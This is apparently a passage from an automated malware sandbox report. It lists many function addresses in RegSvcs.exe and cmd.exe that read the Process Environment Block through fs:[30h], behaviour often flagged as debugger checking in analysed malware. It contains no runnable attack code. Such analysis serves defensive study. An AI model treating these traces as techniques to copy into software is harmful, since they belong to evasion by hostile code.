          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01034015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01034015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01022073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01031074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0102131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01038B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0101D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0102138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01035BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0101B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0101B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01038A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01038D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01018DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01038CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_010214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0103070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01038F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0101FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0101FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01038ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0089B5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0367070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0367070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0366131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03675BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0366138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03627794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03627794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03627794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03634257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C3A1C mov eax, dword ptr fs:[00000030h]
